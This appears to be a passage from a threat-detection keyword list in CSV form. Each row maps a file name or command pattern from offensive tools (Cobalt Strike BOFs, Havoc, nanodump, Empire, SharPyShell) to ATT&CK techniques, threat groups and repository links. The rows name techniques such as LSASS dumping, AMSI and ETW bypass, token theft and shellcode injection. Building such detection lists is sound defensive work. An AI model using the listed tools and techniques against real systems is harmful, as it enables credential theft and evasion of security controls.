-*inceptor/obfuscators*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*inceptor-main.zip*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*include beacon.h*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,0,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*include injection.c*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,0,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*include*bofmask.h*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*incognito* list_tokens -u*,offensive_tool_keyword,AD exploitation cheat sheet,Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*incognito.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*incorrect signature*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*infection_monkey.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*info@skelsecprojects.com*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*infoga.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*information_gathering_tools.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*infosecn1nja/SharpDoor*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*Initial_Access.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*InitialAccess_SpearphishingAttachment_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*initialize_fake_thread_state*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*initialize_spoofed_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*initializeShellcodeFluctuation*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*Initializing domainDumper()*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*initstring/cloud_enum*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*inject 1337 /*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*inject shellcode*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*inject.spawn*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*inject.spoofaddr*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*inject_dll_reflective.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*inject_dll_srdi.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*inject_shellcode.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*inject_shellcode_self*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*inject-amsiBypass *,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectAmsiBypass,1,0,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*inject-amsi-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*inject-amsiBypass.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectAmsiBypass,1,1,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*inject-assembly *,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,0,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*inject-assembly.cna*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*injectassembly.x64.bin*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*injectassembly.x64.o*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*Inject-BypassStuff*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*InjectDll.cpp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*InjectDll.vcxproj*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*injected into LSASS*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,New-HoneyHash.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*InjectedCredentials.csv*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*injectEtwBypass*,offensive_tool_keyword,cobaltstrike,CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 